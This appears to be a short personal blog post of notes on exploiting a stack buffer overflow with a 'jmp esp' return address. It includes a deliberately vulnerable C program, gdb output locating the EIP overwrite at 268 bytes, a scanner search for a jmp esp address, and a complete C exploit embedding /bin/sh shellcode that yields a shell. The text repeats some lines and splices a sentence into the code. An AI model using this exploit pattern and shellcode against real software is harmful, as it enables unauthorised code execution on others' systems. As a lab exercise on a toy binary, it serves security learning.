Just some notes to myself about using a jmp as a return address in an exploit.
At 268 + 4 bytes, eip is overwritten and esp points to the start of my buffer.
Need to find a suitable jmp esp instructions--avoid NULL bytes/other bad characters in the address.
Putting it together.
dennis@ipa:~/bof-jmp$ cat vuln.c /* plant a jmp esp to use */ void func(void) { __asm__("jmp *%esp"); } int main(int argc, char *argv[]) { char buf[256]; strcpy(buf, argv[1]); }
At 268 + 4 bytes, eip is overwritten and esp points to the start of my buffer.
(gdb) run `perl -e 'print "A" x 268 . "B" x 4 . "C" x 4'` Starting program: /home/dennis/jmp-example/vuln `perl -e 'print "A" x 268 . "B" x 4 . "C" x 4'` Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) x/x $esp 0xbffff9f0: 0x43434343
Need to find a suitable jmp esp instructions--avoid NULL bytes/other bad characters in the address.
root@bt:/ftphome# /pentest/exploits/framework3/msfelfscan -j esp vuln [vuln] 0x08048463 jmp esp
Putting it together.
dennis@ipa:~/bof-jmp$ cat exp.c #include <stdio.h> #include <string.h>When usable, using a jmp is much cleaner than hardcoding an address and on some systems--most likely nothing considered new--it can bypass some ASLR restrictions.#define BUFLEN 400 #define VULN "./vuln" #define RET 0x8048463 char shellcode[] = /* aleph one shellcode */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main() { char argv1[BUFLEN + 1]; char *p; char *argv[] = { VULN, argv1, NULL }; p = argv1; /* padding */ memset(p, 'A', 268); p += 268; /* set eip */ //memset(p, 'B', 4); *((void **)p) = (void *)RET; p += 4; /* set nops -- not really needed */ memset(p, '\x90', 16); p += 16; /* set shellcode */ memcpy(p, shellcode, strlen(shellcode)); p += strlen(shellcode); *p = '\0'; execve(argv[0], argv, NULL); return -1; } [dennis@localhost bof-jmp]$ ./exp sh-2.04$
No comments:
Post a Comment